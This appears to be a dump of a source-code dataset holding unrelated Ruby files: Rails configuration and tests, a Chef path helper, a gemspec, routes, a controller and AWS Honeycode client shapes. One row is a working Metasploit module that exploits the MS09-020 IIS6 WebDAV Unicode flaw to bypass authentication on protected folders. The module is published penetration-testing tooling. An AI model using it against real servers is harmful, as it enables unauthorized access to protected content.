hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
bfb086a0d0f319522933d91c01daf7f4e181fb40 | 2,379 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
# Run rails dev:cache to toggle caching.
if Rails.root.join('tmp', 'caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.action_controller.enable_fragment_cache_logging = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{2.days.to_i}"
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Highlight code that triggered database queries in logs.
config.active_record.verbose_query_logs = true
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations.
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
# Extended Configurations
# config action mailer
config.action_mailer.default_url_options = { host: 'localhost', port: 3000 }
end
| 34.985294 | 87 | 0.761665 |
5d32127227f992e457999dfb093bfee8a1dfb867 | 1,883 | require 'test_helper'
class UserTest < ActiveSupport::TestCase
def setup
@user = User.new(name:"Example User", email:"[email protected]",
password:"foobar",password_confirmation: "foobar")
end
test "should be valid" do
assert @user.valid?
end
test "name should be present" do
@user.name = " "
assert_not @user.valid?
end
test "email should be present" do
@user.email = " "
assert_not @user.valid?
end
test "name should not be too long" do
@user.name = "a" * 51
assert_not @user.valid?
end
test "email should not be too long" do
@user.email = "a" * 244 + "@example.com"
assert_not @user.valid?
end
test "email validation should accept valid addresses" do
valid_addresses = %w[[email protected] [email protected] [email protected]
[email protected] [email protected]]
valid_addresses.each do |valid_address|
@user.email = valid_address
assert @user.valid?, "#{valid_address.inspect} should be valid"
end
end
test "email validation should reject invalid addresses" do
invalid_addresses = %w[user@example,com user_at_foo.org user.name@example.
foo@bar_baz.com foo@bar+baz.com]
invalid_addresses.each do |invalid_address|
@user.email = invalid_address
assert_not @user.valid?, "#{invalid_address.inspect} should be invalid"
end
end
test "email addresses should be unique" do
duplicate_user = @user.dup
duplicate_user.email = @user.email.upcase
@user.save
assert_not duplicate_user.valid?
end
test "password should be present (noblank)" do
@user.password = @user.password_confirmation = ""*6
assert_not @user.valid?
end
test "password should have a minimum length" do
@user.password = @user.password_confirmation = "a"*5
assert_not @user.valid?
end
end | 27.691176 | 78 | 0.668083 |
03046945162b06833d7a354cc0fe5a4ceb6be9bb | 10,917 | #
# Author:: Bryan McLellan <[email protected]>
# Copyright:: Copyright 2014-2016, Chef Software, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "chef-config/windows"
require "chef-config/logger"
require "chef-config/exceptions"
module ChefConfig
class PathHelper
# Maximum characters in a standard Windows path (260 including drive letter and NUL)
WIN_MAX_PATH = 259
def self.dirname(path)
if ChefConfig.windows?
# Find the first slash, not counting trailing slashes
end_slash = path.size
loop do
slash = path.rindex(/[#{Regexp.escape(File::SEPARATOR)}#{Regexp.escape(path_separator)}]/, end_slash - 1)
if !slash
return end_slash == path.size ? "." : path_separator
elsif slash == end_slash - 1
end_slash = slash
else
return path[0..slash - 1]
end
end
else
::File.dirname(path)
end
end
BACKSLASH = '\\'.freeze
def self.path_separator
if ChefConfig.windows?
File::ALT_SEPARATOR || BACKSLASH
else
File::SEPARATOR
end
end
def self.join(*args)
path_separator_regex = Regexp.escape(File::SEPARATOR)
unless path_separator == File::SEPARATOR
path_separator_regex << Regexp.escape(path_separator)
end
trailing_slashes = /[#{path_separator_regex}]+$/
leading_slashes = /^[#{path_separator_regex}]+/
args.flatten.inject() do |joined_path, component|
joined_path = joined_path.sub(trailing_slashes, "")
component = component.sub(leading_slashes, "")
joined_path + "#{path_separator}#{component}"
end
end
def self.validate_path(path)
if ChefConfig.windows?
unless printable?(path)
msg = "Path '#{path}' contains non-printable characters. Check that backslashes are escaped with another backslash (e.g. C:\\\\Windows) in double-quoted strings."
ChefConfig.logger.error(msg)
raise ChefConfig::InvalidPath, msg
end
if windows_max_length_exceeded?(path)
ChefConfig.logger.debug("Path '#{path}' is longer than #{WIN_MAX_PATH}, prefixing with'\\\\?\\'")
path.insert(0, "\\\\?\\")
end
end
path
end
def self.windows_max_length_exceeded?(path)
# Check to see if paths without the \\?\ prefix are over the maximum allowed length for the Windows API
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa365247%28v=vs.85%29.aspx
unless path =~ /^\\\\?\\/
if path.length > WIN_MAX_PATH
return true
end
end
false
end
def self.printable?(string)
# returns true if string is free of non-printable characters (escape sequences)
# this returns false for whitespace escape sequences as well, e.g. \n\t
if string =~ /[^[:print:]]/
false
else
true
end
end
# Produces a comparable path.
def self.canonical_path(path, add_prefix = true)
# First remove extra separators and resolve any relative paths
abs_path = File.absolute_path(path)
if ChefConfig.windows?
# Add the \\?\ API prefix on Windows unless add_prefix is false
# Downcase on Windows where paths are still case-insensitive
abs_path.gsub!(::File::SEPARATOR, path_separator)
if add_prefix && abs_path !~ /^\\\\?\\/
abs_path.insert(0, "\\\\?\\")
end
abs_path.downcase!
end
abs_path
end
# This is the INVERSE of Pathname#cleanpath, it converts forward
# slashes to backwhacks for Windows. Since the Ruby API and the
# Windows APIs all consume forward slashes, this helper function
# should only be used for *DISPLAY* logic to send strings back
# to the user with backwhacks. Internally, filename paths should
# generally be stored with forward slashes for consistency. It is
# not necessary or desired to blindly convert pathnames to have
# backwhacks on Windows.
#
# Generally, if the user isn't going to be seeing it, you should be
# using Pathname#cleanpath intead of this function.
def self.cleanpath(path)
path = Pathname.new(path).cleanpath.to_s
# ensure all forward slashes are backslashes
if ChefConfig.windows?
path = path.gsub(File::SEPARATOR, path_separator)
end
path
end
def self.paths_eql?(path1, path2)
canonical_path(path1) == canonical_path(path2)
end
# Note: this method is deprecated. Please use escape_glob_dirs
# Paths which may contain glob-reserved characters need
# to be escaped before globbing can be done.
# http://stackoverflow.com/questions/14127343
def self.escape_glob(*parts)
path = cleanpath(join(*parts))
path.gsub(/[\\\{\}\[\]\*\?]/) { |x| "\\" + x }
end
# This function does not switch to backslashes for windows
# This is because only forwardslashes should be used with dir (even for windows)
def self.escape_glob_dir(*parts)
path = Pathname.new(join(*parts)).cleanpath.to_s
path.gsub(/[\\\{\}\[\]\*\?]/) { |x| "\\" + x }
end
def self.relative_path_from(from, to)
Pathname.new(cleanpath(to)).relative_path_from(Pathname.new(cleanpath(from)))
end
# Retrieves the "home directory" of the current user while trying to ascertain the existence
# of said directory. The path returned uses / for all separators (the ruby standard format).
# If the home directory doesn't exist or an error is otherwise encountered, nil is returned.
#
# If a set of path elements is provided, they are appended as-is to the home path if the
# homepath exists.
#
# If an optional block is provided, the joined path is passed to that block if the home path is
# valid and the result of the block is returned instead.
#
# Home-path discovery is performed once. If a path is discovered, that value is memoized so
# that subsequent calls to home_dir don't bounce around.
#
# See self.all_homes.
def self.home(*args)
@@home_dir ||= self.all_homes { |p| break p }
if @@home_dir
path = File.join(@@home_dir, *args)
block_given? ? (yield path) : path
end
end
# See self.home. This method performs a similar operation except that it yields all the different
# possible values of 'HOME' that one could have on this platform. Hence, on windows, if
# HOMEDRIVE\HOMEPATH and USERPROFILE are different, the provided block will be called twice.
# This method goes out and checks the existence of each location at the time of the call.
#
# The return is a list of all the returned values from each block invocation or a list of paths
# if no block is provided.
def self.all_homes(*args)
paths = []
if ChefConfig.windows?
# By default, Ruby uses the the following environment variables to determine Dir.home:
# HOME
# HOMEDRIVE HOMEPATH
# USERPROFILE
# Ruby only checks to see if the variable is specified - not if the directory actually exists.
# On Windows, HOMEDRIVE HOMEPATH can point to a different location (such as an unavailable network mounted drive)
# while USERPROFILE points to the location where the user application settings and profile are stored. HOME
# is not defined as an environment variable (usually). If the home path actually uses UNC, then the prefix is
# HOMESHARE instead of HOMEDRIVE.
#
# We instead walk down the following and only include paths that actually exist.
# HOME
# HOMEDRIVE HOMEPATH
# HOMESHARE HOMEPATH
# USERPROFILE
paths << ENV["HOME"]
paths << ENV["HOMEDRIVE"] + ENV["HOMEPATH"] if ENV["HOMEDRIVE"] && ENV["HOMEPATH"]
paths << ENV["HOMESHARE"] + ENV["HOMEPATH"] if ENV["HOMESHARE"] && ENV["HOMEPATH"]
paths << ENV["USERPROFILE"]
end
paths << Dir.home if ENV["HOME"]
# Depending on what environment variables we're using, the slashes can go in any which way.
# Just change them all to / to keep things consistent.
# Note: Maybe this is a bad idea on some unixy systems where \ might be a valid character depending on
# the particular brand of kool-aid you consume. This code assumes that \ and / are both
# path separators on any system being used.
paths = paths.map { |home_path| home_path.gsub(path_separator, ::File::SEPARATOR) if home_path }
# Filter out duplicate paths and paths that don't exist.
valid_paths = paths.select { |home_path| home_path && Dir.exists?(home_path.force_encoding("utf-8")) }
valid_paths = valid_paths.uniq
# Join all optional path elements at the end.
# If a block is provided, invoke it - otherwise just return what we've got.
joined_paths = valid_paths.map { |home_path| File.join(home_path, *args) }
if block_given?
joined_paths.each { |p| yield p }
else
joined_paths
end
end
# Determine if the given path is protected by OS X System Integrity Protection.
def self.is_sip_path?(path, node)
if node["platform"] == "mac_os_x" && Gem::Version.new(node["platform_version"]) >= Gem::Version.new("10.11")
# todo: parse rootless.conf for this?
sip_paths = [
"/System", "/bin", "/sbin", "/usr"
]
sip_paths.each do |sip_path|
ChefConfig.logger.info("This is a SIP path, checking if it in exceptions list.")
return true if path.start_with?(sip_path)
end
false
else
false
end
end
# Determine if the given path is on the exception list for OS X System Integrity Protection.
def self.writable_sip_path?(path)
# todo: parse rootless.conf for this?
sip_exceptions = [
"/System/Library/Caches", "/System/Library/Extensions",
"/System/Library/Speech", "/System/Library/User Template",
"/usr/libexec/cups", "/usr/local", "/usr/share/man"
]
sip_exceptions.each do |exception_path|
return true if path.start_with?(exception_path)
end
ChefConfig.logger.error("Cannot write to a SIP Path on OS X 10.11+")
false
end
end
end
| 38.440141 | 172 | 0.654942 |
62996e29494ce567b4b6f24cbf59abb8b824435f | 224 | class ApplicationMailer < ActionMailer::Base
MILIEU_EMAIL_ADDRESS = '[email protected]'.freeze
NOTIFICATION_EMAIL_ADDRESS = '[email protected]'.freeze
default from: NOTIFICATION_EMAIL_ADDRESS
layout 'mailer'
end
| 28 | 63 | 0.808036 |
fffede2acd198f8d16b3b24d36924ec87cf9a084 | 115 | # frozen_string_literal: true
require 'support/coverage'
require 'env_mock'
require 'pry-byebug'
require 'rspec'
| 14.375 | 29 | 0.782609 |
1866be705cb79d2779b28a8c63327904d38debf3 | 203 | class CreateEvents < ActiveRecord::Migration[5.2]
def change
create_table :events do |t|
t.string :name
t.integer :distance
t.string :stroke
t.timestamps
end
end
end
| 16.916667 | 49 | 0.640394 |
01b7c5e0948da1c975a6fe5f85422d310b5b4f0a | 690 | # -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = 'fb_rails'
s.version = '1.2.0'
s.summary = 'Facebook on Rails'
s.description = 'A Rails 3 gem for the latest facebook API'
s.required_ruby_version = '>= 1.9.2'
s.required_rubygems_version = '>= 1.3.5'
s.author = 'Matthew Higgins'
s.email = '[email protected]'
s.homepage = 'http://github.com/matthuhiggins/fb_rails'
s.extra_rdoc_files = ['README.rdoc']
s.files = %w(MIT-LICENSE Rakefile README.rdoc) + Dir['{lib,test}/**/*.rb']
s.require_path = 'lib'
s.add_development_dependency('rails', '>= 3.0.0')
s.add_development_dependency('fakeweb')
end
| 31.363636 | 76 | 0.634783 |
8727e4dda14756e975774b36069f2d47c021ddfb | 533 | platform_is :windows do
require 'win32ole'
describe 'WIN32OLE_METHOD#invkind' do
before :each do
ole_type = WIN32OLE_TYPE.new("Microsoft Scripting Runtime", "File")
@m_file_name = WIN32OLE_METHOD.new(ole_type, "name")
end
it 'raises ArgumentError if argument is given' do
lambda { @m_file_name.invkind(1) }.should raise_error ArgumentError
end
it 'returns expected value for Scripting Runtime\'s "name" method' do
@m_file_name.invkind.should == 2
end
end
end | 26.65 | 73 | 0.679174 |
f710262eab160b54d2fe9f3fa167b8a9656d8c78 | 5,606 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WmapScanDir
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner',
'Description' => %q{
This module is based on et's HTTP Directory Scanner module,
with one exception. Where authentication is required, it attempts
to bypass authentication using the WebDAV IIS6 Unicode vulnerability
discovered by Kingcope. The vulnerability appears to be exploitable
where WebDAV is enabled on the IIS6 server, and any protected folder
requires either Basic, Digest or NTLM authentication.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'MSB', 'MS09-020' ],
[ 'CVE', '2009-1535' ],
[ 'CVE', '2009-1122' ],
[ 'OSVDB', '54555' ],
[ 'BID', '34993' ],
]))
register_options(
[
OptString.new('PATH', [ true, "The path to identify files", '/']),
OptInt.new('ERROR_CODE', [ true, "Error code for non existent directory", 404]),
OptPath.new('DICTIONARY', [ false, "Path of word dictionary to use",
File.join(Msf::Config.install_root, "data", "wmap", "wmap_dirs.txt")
]
),
OptPath.new('HTTP404S', [ false, "Path of 404 signatures to use",
File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt")
]
)
], self.class)
register_advanced_options(
[
OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ])
], self.class)
end
def run_host(ip)
conn = true
ecode = nil
emesg = nil
tpath = normalize_uri(datastore['PATH'])
if tpath[-1,1] != '/'
tpath += '/'
end
ecode = datastore['ERROR_CODE'].to_i
vhost = datastore['VHOST'] || wmap_target_host
prot = datastore['SSL'] ? 'https' : 'http'
#
# Detect error code
#
begin
randdir = Rex::Text.rand_text_alpha(5).chomp + '/'
res = send_request_cgi({
'uri' => tpath+randdir,
'method' => 'GET',
'ctype' => 'text/html'
}, 20)
return if not res
tcode = res.code.to_i
# Look for a string we can signature on as well
if(tcode >= 200 and tcode <= 299)
File.open(datastore['HTTP404S'], 'rb').each do |str|
if(res.body.index(str))
emesg = str
break
end
end
if(not emesg)
print_status("Using first 256 bytes of the response as 404 string")
emesg = res.body[0,256]
else
print_status("Using custom 404 string of '#{emesg}'")
end
else
ecode = tcode
print_status("Using code '#{ecode}' as not found.")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
conn = false
rescue ::Timeout::Error, ::Errno::EPIPE
end
return if not conn
webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/>' +
'<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +
'<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'
File.open(datastore['DICTIONARY'], 'rb').each do |testf|
begin
testfdir = testf.chomp + '/'
res = send_request_cgi({
'uri' => tpath + testfdir,
'method' => 'PROPFIND',
'ctype' => 'application/xml',
'headers' =>
{
},
'data' => webdav_req + "\r\n\r\n",
}, 20)
if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
if !datastore['NoDetailMessages']
print_status("NOT Found #{wmap_base_url}#{tpath}#{testfdir} #{res.code} (#{wmap_target_host})")
end
elsif (res.code.to_i == 401)
print_status("Found protected folder #{wmap_base_url}#{tpath}#{testfdir} #{res.code} (#{wmap_target_host})")
print_status("\tTesting for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.")
cset = %W{ & ^ % $ # @ ! }
buff = ''
blen = rand(16)+1
while(buff.length < blen)
buff << cset[ rand(cset.length) ]
end
bogus = Rex::Text.uri_encode(Rex::Text.to_unicode( buff, 'utf-8', 'overlong', 2))
res = send_request_cgi({
'uri' => tpath + bogus + testfdir,
'method' => 'PROPFIND',
'ctype' => 'application/xml',
'headers' =>
{
#'Translate' => 'f', # Not required in PROPFIND, only GET - patrickw 20091518
},
'data' => webdav_req + "\r\n\r\n",
}, 20)
if (res.code.to_i == 207)
print_status("\tFound vulnerable WebDAV Unicode bypass target #{wmap_base_url}#{tpath}%c0%af#{testfdir} #{res.code} (#{wmap_target_host})")
# Unable to use report_web_vuln as method is PROPFIND and is not part of allowed
# list in db.rb
report_note(
:host => ip,
:proto => 'tcp',
:sname => (ssl ? 'https' : 'http'),
:port => rport,
:type => 'UNICODE_WEBDAV_BYPASS',
:data => "#{tpath}%c0%af#{testfdir} Code: #{res.code}",
:update => :unique_data
)
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
end
| 29.046632 | 145 | 0.61345 |
ff74f4a60a087da3c2321c5d5daf50ba28e07510 | 288 | Rails.application.routes.draw do
# Define your application routes per the DSL in https://guides.rubyonrails.org/routing.html
resources :actors, only: [:index]
# Defines the root path route ("/")
root "actors#index"
require 'sidekiq/web'
mount Sidekiq::Web => '/sidekiq'
end
| 26.181818 | 93 | 0.715278 |
f8458ade71cc471d25aafd158dc60bf584f7eb8e | 1,877 | class SubjectsController < ApplicationController
before_action :set_subject, only: [:show, :edit, :update, :destroy]
# GET /subjects
# GET /subjects.json
def index
@subjects = Subject.all
end
# GET /subjects/1
# GET /subjects/1.json
def show
end
# GET /subjects/new
def new
@subject = Subject.new
end
# GET /subjects/1/edit
def edit
end
# POST /subjects
# POST /subjects.json
def create
@subject = Subject.new(subject_params)
respond_to do |format|
if @subject.save
format.html { redirect_to @subject, notice: 'Subject was successfully created.' }
format.json { render :show, status: :created, location: @subject }
else
format.html { render :new }
format.json { render json: @subject.errors, status: :unprocessable_entity }
end
end
end
# PATCH/PUT /subjects/1
# PATCH/PUT /subjects/1.json
def update
respond_to do |format|
if @subject.update(subject_params)
format.html { redirect_to @subject, notice: 'Subject was successfully updated.' }
format.json { render :show, status: :ok, location: @subject }
else
format.html { render :edit }
format.json { render json: @subject.errors, status: :unprocessable_entity }
end
end
end
# DELETE /subjects/1
# DELETE /subjects/1.json
def destroy
@subject.destroy
respond_to do |format|
format.html { redirect_to subjects_url, notice: 'Subject was successfully destroyed.' }
format.json { head :no_content }
end
end
private
# Use callbacks to share common setup or constraints between actions.
def set_subject
@subject = Subject.find(params[:id])
end
# Never trust parameters from the scary internet, only allow the white list through.
def subject_params
params.require(:subject).permit(:name)
end
end
| 24.697368 | 93 | 0.665424 |
261e4e1a51f16e1452feb8b4481278cbd3469aee | 139 | require File.expand_path('../../../spec_helper', __FILE__)
describe "Date#cweek" do
it "needs to be reviewed for spec completeness"
end
| 23.166667 | 58 | 0.726619 |
03d4eb2a171f5c5d0911e0a910ab26eb85a08fc5 | 2,381 | AppRoot::Application.routes.draw do
root to: 'application#index'
controller :sorcery do
get :test_login
get :test_logout
get :some_action
post :test_return_to
get :test_auto_login
post :test_login_with_remember_in_login
get :test_login_from_cookie
get :test_login_from
get :test_logout_with_remember
get :test_logout_with_force_forget_me
get :test_invalidate_active_session
get :test_should_be_logged_in
get :test_create_from_provider
get :test_add_second_provider
get :test_return_to_with_external
get :test_login_from
get :test_login_from_twitter
get :test_login_from_facebook
get :test_login_from_github
get :test_login_from_paypal
get :test_login_from_wechat
get :test_login_from_microsoft
get :test_login_from_google
get :test_login_from_liveid
get :test_login_from_vk
get :test_login_from_jira
get :test_login_from_salesforce
get :test_login_from_slack
get :test_login_from_instagram
get :test_login_from_auth0
get :login_at_test
get :login_at_test_twitter
get :login_at_test_facebook
get :login_at_test_github
get :login_at_test_paypal
get :login_at_test_wechat
get :login_at_test_microsoft
get :login_at_test_google
get :login_at_test_liveid
get :login_at_test_vk
get :login_at_test_jira
get :login_at_test_salesforce
get :login_at_test_slack
get :login_at_test_instagram
get :login_at_test_auth0
get :test_return_to_with_external
get :test_return_to_with_external_twitter
get :test_return_to_with_external_facebook
get :test_return_to_with_external_github
get :test_return_to_with_external_paypal
get :test_return_to_with_external_wechat
get :test_return_to_with_external_microsoft
get :test_return_to_with_external_google
get :test_return_to_with_external_liveid
get :test_return_to_with_external_vk
get :test_return_to_with_external_jira
get :test_return_to_with_external_salesforce
get :test_return_to_with_external_slack
get :test_return_to_with_external_instagram
get :test_return_to_with_external_auth0
get :test_http_basic_auth
get :some_action_making_a_non_persisted_change_to_the_user
post :test_login_with_remember
get :test_create_from_provider_with_block
get :login_at_test_with_state
end
end
| 33.069444 | 62 | 0.797984 |
38413c5742e081ec35db3f3239a1067fd1544fe6 | 1,188 | require_relative '../ports/identity_port'
module Existence
module Adapters
class AdapterBase
include Dry::Monads::Either::Mixin
SUCCESS_STATUS = :ok
attr_reader :port
def initialize(port: Ports::IdentityPort, config: Configuration, **) #oauth_token_value: Domain::OauthTokenValue
@port = port
@config = config.config
# @oauth_token_value = oauth_token_value
end
private
def result(result)
return Left(result.value) if result.failure? || failure_status(result.value.status)
Right(value(result.value.body))
end
# overridden by adapters that wish to return a non-port value.
def value(result)
result
end
def bearer_token(jwt)
"Bearer #{jwt}"
end
def failure_status(status)
status != SUCCESS_STATUS
end
def basic_auth_token(credentials)
basic_credentials(credentials[:client_id], credentials[:client_secret])
end
def basic_credentials(user, secret)
Base64.strict_encode64("#{user}:#{secret}")
end
def service
@config.identity_host
end
end
end
end
| 20.135593 | 118 | 0.635522 |
ab04e0da6f95e8b80922441fbfac7f0c1bb8dc8b | 1,592 | # Puzzle: http://adventofcode.com/2017/day/3
# --- Day 3: Spiral Memory ---
#
# You come across an experimental new kind of memory stored on an infinite
# two-dimensional grid.
#
# Each square on the grid is allocated in a spiral pattern starting at a
# location marked 1 and then counting up while spiraling outward. For example,
# the first few squares are allocated like this:
#
# 17 16 15 14 13
# 18 5 4 3 12
# 19 6 1 2 11
# 20 7 8 9 10
# 21 22 23---> ...
#
# While this is very space-efficient (no squares are skipped), requested data
# must be carried back to square 1 (the location of the only access port for
# this memory system) by programs that can only move up, down, left, or right.
# They always take the shortest path: the Manhattan Distance
# <https://en.wikipedia.org/wiki/Taxicab_geometry> between the location of the
# data and square 1.
#
# For example:
#
# - Data from square 1 is carried 0 steps, since it's at the access port.
# - Data from square 12 is carried 3 steps, such as: down, left, left.
# - Data from square 23 is carried only 2 steps: up twice.
# - Data from square 1024 must be carried 31 steps.
#
# How many steps are required to carry the data from the square identified in
# your puzzle input all the way to the access port?
#
# Your puzzle input is 289326.
input = 289326
next_whole_square_root = (input ** 0.5).ceil
next_odd_square_root = next_whole_square_root.odd? ?
next_whole_square_root :
next_whole_square_root + 1
| 37.023256 | 80 | 0.675251 |
f712644835e14291a1817f4581280c23cab67294 | 969 | require 'ethereum-contract-abi/encoders/decimal_encoder'
require 'ethereum-contract-abi/util'
include EthereumContractABI::Encoders
describe EthereumContractABI::Encoders::DecimalEncoder do
describe "encode" do
it "encodes basic decimal number with 2 digits of precision" do
expected = "0000000000000000000000000000000000000000000000000000000000001B39"
expected_hex = EthereumContractABI::Util.toHexByteString(expected)
result = DecimalEncoder.encode_value(69.69, 2)
expect(result).to eq(expected_hex)
expect(result.bytesize).to eq(32)
end
it "encodes basic negative decimal number with 2 digits of precision" do
expected = "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE4C7"
expected_hex = EthereumContractABI::Util.toHexByteString(expected)
result = DecimalEncoder.encode_value(-69.69, 2)
expect(result).to eq(expected_hex)
expect(result.bytesize).to eq(32)
end
end
end | 40.375 | 83 | 0.767802 |
6283a22db3cfa18cc6f2e83246701ef8d1bd0de2 | 912 | require 'opal/nodes'
class Opal::Nodes::CallNode
# Rubyspec uses this call to load in language specific features at runtime.
# We can't do this at runtime, so handle it during compilation
add_special :language_version do
if scope.top?
lang_type = arglist[2][1]
target = "corelib/language/versions/#{lang_type}_1.9"
if File.exist?(target)
compiler.requires << target
end
push fragment("nil")
end
end
add_special :not_supported_on do
unless arglist.flatten.include? :opal
compile_default!
end
end
add_special :not_compliant_on do
unless arglist.flatten.include? :opal
compile_default!
end
end
add_special :platform_is_not do
unless arglist.flatten.include? :opal
compile_default!
end
end
add_special :platform_is do
if arglist.flatten.include? :opal
compile_default!
end
end
end
| 20.266667 | 77 | 0.685307 |
5d789c5d5bb0731e6c308361d3f3fbf2256bd570 | 847 | # OpenStack Compute (Nova) Example
require 'fog'
require 'fog/openstack'
auth_url = "https://example.net/v2.0/tokens"
username = '[email protected]'
password = 'secret'
tenant = 'My Compute Tenant' # String
compute_client ||= ::Fog::Compute.new(
:provider => :openstack,
:openstack_api_key => password,
:openstack_username => username,
:openstack_auth_url => auth_url,
:openstack_tenant => tenant,
)
vm = compute_client.servers.create(
:name => name,
:flavor_ref => flavor,
:block_device_mapping_v2 => [
{
:boot_index => 0
:device_name => "vda",
:source_type => "volume", # Or "snapshot"
:destination_type => "volume",
:delete_on_termination => false,
:uuid => cinder_uddi,
}
]
)
| 25.666667 | 58 | 0.57379 |
9112d904823048b8ed6e34841faca5d688e3932a | 135 | module PerformEvery
class Railtie < ::Rails::Railtie
rake_tasks do
load "tasks/perform_every_tasks.rake"
end
end
end
| 16.875 | 43 | 0.703704 |
039254b5968d94aa6582d5ab88636c97db4ba703 | 243 | require 'rails_helper'
RSpec.describe "family_members/show", type: :view do
# before(:each) do
# @family_member = assign(:family_member, FamilyMember.create!())
# end
#
# it "renders attributes in <p>" do
# render
# end
end
| 20.25 | 69 | 0.662551 |
b9b81ec9ecda4b12c844d0f716415746c168dec6 | 199 | require 'rails'
module Proxied
class Railtie < Rails::Railtie
rake_tasks do
Dir[File.join(File.dirname(__FILE__), '../tasks/*.rake')].each { |ext| load ext }
end
end
end
| 16.583333 | 87 | 0.61809 |
62688333c338756b63f4e0277e617ebd70bb94bf | 320 | # Sample code from Programing Ruby, page 15
inst_section = {
'cello' => 'string',
'clarinet' => 'woodwind',
'drum' => 'percussion',
'oboe' => 'woodwind',
'trumpet' => 'brass',
'violin' => 'string'
}
inst_section['oboe']
inst_section['cello']
inst_section['bassoon']
| 24.615385 | 43 | 0.546875 |
bba4fe33e9dd3bb6cd68bc6d3494f2d79b73268f | 442 | require 'test_helper'
class TeamProjectsHelperTest < ActionView::TestCase
setup do
@c_id = classrooms(:one).id
@t_id = team_projects(:one).id
end
test "helpers" do
begin
classroom_path_team_project_prefix
rescue Errno::ECONNREFUSED
end
assert true
end
private
def params
{classroom_id: @c_id,
team_project_id: @t_id}
end
def current_user
Session.new 1, 'token', 'name'
end
end | 16.37037 | 51 | 0.678733 |
ab2064470da290f2f3f1dd2ac7da28c3de938e64 | 594 | require_relative 'boot'
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module GoalApp
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.1
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
end
end
| 31.263158 | 82 | 0.765993 |
386833711079f2eee3dcfd98ab5ec13e57d7c6db | 46,664 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
module Aws::Honeycode
# @api private
module ClientApi
include Seahorse::Model
AccessDeniedException = Shapes::StructureShape.new(name: 'AccessDeniedException')
AutomationExecutionException = Shapes::StructureShape.new(name: 'AutomationExecutionException')
AutomationExecutionTimeoutException = Shapes::StructureShape.new(name: 'AutomationExecutionTimeoutException')
AwsUserArn = Shapes::StringShape.new(name: 'AwsUserArn')
BatchCreateTableRowsRequest = Shapes::StructureShape.new(name: 'BatchCreateTableRowsRequest')
BatchCreateTableRowsResult = Shapes::StructureShape.new(name: 'BatchCreateTableRowsResult')
BatchDeleteTableRowsRequest = Shapes::StructureShape.new(name: 'BatchDeleteTableRowsRequest')
BatchDeleteTableRowsResult = Shapes::StructureShape.new(name: 'BatchDeleteTableRowsResult')
BatchErrorMessage = Shapes::StringShape.new(name: 'BatchErrorMessage')
BatchItemId = Shapes::StringShape.new(name: 'BatchItemId')
BatchUpdateTableRowsRequest = Shapes::StructureShape.new(name: 'BatchUpdateTableRowsRequest')
